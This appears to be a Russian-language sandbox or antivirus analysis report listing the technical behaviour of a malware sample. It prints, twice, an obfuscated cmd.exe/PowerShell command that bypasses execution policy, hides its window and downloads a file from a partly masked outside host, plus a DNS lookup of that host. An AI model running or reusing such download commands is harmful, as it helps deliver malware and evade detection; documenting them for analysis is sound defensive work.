Техническая информация
- http://fo###repu.top/read.php?f=##### как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOw^e^RShell.EXE -^E^xE^cuTIO^npO^liCy b^yp^aS^s^ ^-NopROfILe ^-^wIn^dows^T^y^lE ^hI^D^D^En^ (NE^W-obJ^ec^t^ Sy^sTeM^.net.wE^BCLi^E^NT).^dOwNlo^A^DFile('http://fo###repu.top/rea...
- DNS ASK fo###repu.top
- '<SYSTEM32>\cmd.exe' /C "pOw^e^RShell.EXE -^E^xE^cuTIO^npO^liCy b^yp^aS^s^ ^-NopROfILe ^-^wIn^dows^T^y^lE ^hI^D^D^En^ (NE^W-obJ^ec^t^ Sy^sTeM^.net.wE^BCLi^E^NT).^dOwNlo^A^DFile('http://fo###repu.top/rea...' (со скрытым окном)